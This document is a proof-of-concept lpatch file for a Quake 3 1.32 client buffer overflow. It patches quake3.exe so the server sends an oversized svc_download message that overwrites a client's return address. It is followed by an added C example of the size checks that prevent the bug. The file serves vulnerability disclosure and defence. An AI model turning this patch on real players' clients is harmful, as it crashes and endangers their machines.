====================================================================================
#
# this file has been created for the Lame patcher program available for both *nix
# and Windows platforms.
# You need this program for continuing the patching of your files:
#
#   http://aluigi.org/mytoolz.htm#lpatch
#
# Quick step-by-step
# - launch lpatch.exe
# - select this q3cbof.lpatch file
# - read the message windows and click yes
# - select the quake3.exe file to patch
# - read the message windows to know if everything has been patched correctly
# - test your client using this malicious server executable

TITLE
q3cbof proof-of-concept for Quake 3 1.32 Windows executable 0.1
by Luigi Auriemma
e-mail: aluigi@autistici.org
web:    aluigi.org

INTRO
Advisory:
.
.   http://aluigi.org/adv/q3cbof-adv.txt
.
This patch transforms a Windows Quake 3 1.32 executable into a proof-of-concept
for testing the above bug: any client that tries to connect to this server
will crash with the return address overwritten by 0x41414141.

FILE
quake3.exe

RVA
00400000

BYTES_ORIGINAL
; void SV_SendClientGameState( client_t *client )
8D 44 24 38         ; // send the gamestate
6A 02
50
E8 2B 4D FF FF
8B 8E 04 04 01 00
51
8D 54 24 44
52
E8 9A 4D FF FF
83 C4 3C
33 ED
BF 04 76 97 00
8B 07
80 38 00
74 27
8D 4C 24 0C
6A 03
51
E8 FD 4C FF FF
8D 54
; ...
BYTES_PATCH
6a 06               ; push svc_download
8D 44 24 3c 50      ; push &msg
e8 ^004295F0        ; call MSG_WriteByte
6a ff               ; push -1
8D 44 24 44 50      ; push &msg
e8 ^00429650        ; call MSG_WriteShort
68 |00004020        ; push 16384 + 32
8D 44 24 4c 50      ; push &msg
e8 ^00429650        ; call MSG_WriteShort
33 db               ; for(i = 0;
6a 00               ; push 0x00
8D 44 24 54 50      ; push &msg
e8 ^004295F0        ; call MSG_WriteByte
58                  ; pop eax
58                  ; pop eax
43                  ; i++
81 fb |4000         ; i < 16384
7c e9
33 db               ; for(i = 0;  // return address
6a 41               ; push 'A'
8D 44 24 54 50      ; push &msg
e8 ^004295F0        ; call MSG_WriteByte
58                  ; pop eax
58                  ; pop eax
43                  ; i++
81 fb |20           ; i < 32
7c e9
56                  ; push client
8D 44 24 54 50      ; push &msg
e8 ^0043AFC0        ; call SV_SendMessageToClient
83 c4 4c            ; free stack and return
e9 ^004349B6
====================================================================================
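The patch above makes the server emit an svc_download message whose declared block size (16384 + 32) is far larger than what a client expects, and the client copies it into a fixed stack buffer. The following C program is an added example and is not part of the lpatch file or of the Quake 3 source: it shows the client-side check that prevents this class of bug, namely validating the declared size against both the receive buffer capacity and the bytes actually present before anything is copied. The command value 6 comes from the `push svc_download` line in the patch; the buffer capacity `DOWNLOAD_BLK_CAPACITY` and the message layout (one command byte, then two little-endian 16-bit fields, then the payload, matching the MSG_WriteByte/MSG_WriteShort calls) are assumptions for this illustration, and all sample messages are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Assumed for this illustration: the command byte matches the
 * "push svc_download" value in the patch; the receive capacity is a
 * constructed constant, not a value taken from the game source. */
#define SVC_DOWNLOAD          6
#define DOWNLOAD_BLK_CAPACITY 2048

enum dl_status {
    DL_OK = 0,
    DL_BAD_COMMAND,       /* first byte is not svc_download */
    DL_TRUNCATED,         /* header or payload shorter than declared */
    DL_SIZE_OUT_OF_RANGE  /* declared size exceeds the receive buffer */
};

/* Little-endian 16-bit read, the byte order MSG_WriteShort produces on x86. */
static int16_t read_short_le(const uint8_t *p) {
    return (int16_t)(p[0] | (p[1] << 8));
}

/* Parse one svc_download message into 'out' (capacity out_cap bytes).
 * The declared size is checked against the destination buffer and
 * against the bytes really present before the copy happens; the
 * vulnerable code path trusted 'size' and copied unconditionally. */
enum dl_status parse_download_block(const uint8_t *msg, size_t len,
                                    uint8_t *out, size_t out_cap,
                                    int *block, int *size)
{
    if (len < 5) return DL_TRUNCATED;
    if (msg[0] != SVC_DOWNLOAD) return DL_BAD_COMMAND;

    *block = read_short_le(msg + 1);
    *size  = read_short_le(msg + 3);

    if (*size < 0 || (size_t)*size > out_cap) return DL_SIZE_OUT_OF_RANGE;
    if ((size_t)*size > len - 5) return DL_TRUNCATED;

    memcpy(out, msg + 5, (size_t)*size);
    return DL_OK;
}

/* Constructed sample: block 1, three payload bytes. Accepted. */
int demo_benign(void) {
    const uint8_t msg[] = { SVC_DOWNLOAD, 0x01, 0x00, 0x03, 0x00, 'a', 'b', 'c' };
    uint8_t buf[DOWNLOAD_BLK_CAPACITY];
    int block, size;
    return parse_download_block(msg, sizeof msg, buf, sizeof buf, &block, &size);
}

/* Constructed sample: the header the patched server sends (block -1,
 * size 0x4020 = 16384 + 32). Rejected before any byte is copied. */
int demo_oversized(void) {
    const uint8_t msg[] = { SVC_DOWNLOAD, 0xff, 0xff, 0x20, 0x40 };
    uint8_t buf[DOWNLOAD_BLK_CAPACITY];
    int block, size;
    return parse_download_block(msg, sizeof msg, buf, sizeof buf, &block, &size);
}

/* Constructed sample: size fits the buffer but the datagram is short. */
int demo_truncated(void) {
    const uint8_t msg[] = { SVC_DOWNLOAD, 0x02, 0x00, 0x08, 0x00, 'x', 'y' };
    uint8_t buf[DOWNLOAD_BLK_CAPACITY];
    int block, size;
    return parse_download_block(msg, sizeof msg, buf, sizeof buf, &block, &size);
}

int main(void) {
    printf("benign:    %d (0 = accepted)\n", demo_benign());
    printf("oversized: %d (3 = size rejected)\n", demo_oversized());
    printf("truncated: %d (2 = short datagram)\n", demo_truncated());
    return 0;
}
```

The second check matters as much as the first: a size that fits the buffer but exceeds the received datagram would otherwise read past the end of the packet, so both limits are enforced before `memcpy` runs.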